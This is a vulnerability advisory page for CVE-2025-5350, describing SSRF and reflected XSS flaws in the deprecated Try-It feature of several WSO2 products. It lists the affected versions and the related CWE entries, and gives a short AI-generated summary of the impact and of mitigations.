CVE-2025-5350
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-10-24

Last updated on: 2025-11-21

Assigner: WSO2 LLC

Description
SSRF and Reflected XSS Vulnerabilities exist in multiple WSO2 products within the deprecated Try-It feature, which was accessible only to administrative users. This feature accepted user-supplied URLs without proper validation, leading to server-side request forgery (SSRF). Additionally, the retrieved content was directly reflected in the HTTP response, enabling reflected cross-site scripting (XSS) in the admin user's browser context. By tricking an administrator into accessing a crafted link, an attacker could force the server to fetch malicious content and reflect it into the admin’s browser, leading to arbitrary JavaScript execution for UI manipulation or data exfiltration. While session cookies are protected with the HttpOnly flag, the XSS still poses a significant security risk. Furthermore, SSRF can be used by a privileged user to query internal services, potentially aiding in internal network enumeration if the target endpoints are reachable from the affected product.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-10-24
Last Modified
2025-11-21
Generated
2026-06-16
AI Q&A
2025-10-24
EPSS Evaluated
2026-06-15
NVD
CVE-2025-5350
Affected Vendors & Products
Showing 22 associated CPEs
Vendor Product Version / Range
wso2 api_control_plane 4.5.0
wso2 api_manager 3.1.0
wso2 api_manager 3.2.0
wso2 api_manager 3.2.1
wso2 api_manager 4.0.0
wso2 api_manager 4.1.0
wso2 api_manager 4.2.0
wso2 api_manager 4.3.0
wso2 api_manager 4.4.0
wso2 api_manager 4.5.0
wso2 enterprise_integrator 6.6.0
wso2 identity_server 5.10.0
wso2 identity_server 5.11.0
wso2 identity_server 6.0.0
wso2 identity_server 6.1.0
wso2 identity_server 7.0.0
wso2 identity_server 7.1.0
wso2 identity_server_as_key_manager 5.10.0
wso2 open_banking_am 2.0.0
wso2 open_banking_iam 2.0.0
wso2 traffic_manager 4.5.0
wso2 universal_gateway 4.5.0
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability involves SSRF (Server-Side Request Forgery) and reflected XSS (Cross-Site Scripting) in multiple WSO2 products within a deprecated Try-It feature accessible only to administrative users. The feature accepted user-supplied URLs without proper validation, allowing an attacker to make the server fetch malicious content. This content was then reflected in the admin user's browser, enabling arbitrary JavaScript execution. This can be exploited by tricking an administrator into clicking a crafted link, leading to UI manipulation or data theft.

Impact Analysis

The vulnerability can impact you by allowing an attacker to execute arbitrary JavaScript in the context of an administrator's browser, potentially manipulating the user interface or stealing data. Additionally, SSRF can enable a privileged user to query internal services, which may help in internal network enumeration if those services are reachable, increasing the risk of further attacks.

Mitigation Strategies

Immediate steps to mitigate this vulnerability include disabling or removing the deprecated Try-It feature in affected WSO2 products, restricting administrative access to trusted users only, and ensuring that user-supplied URLs are properly validated and sanitized to prevent SSRF and reflected XSS attacks.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-5350. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart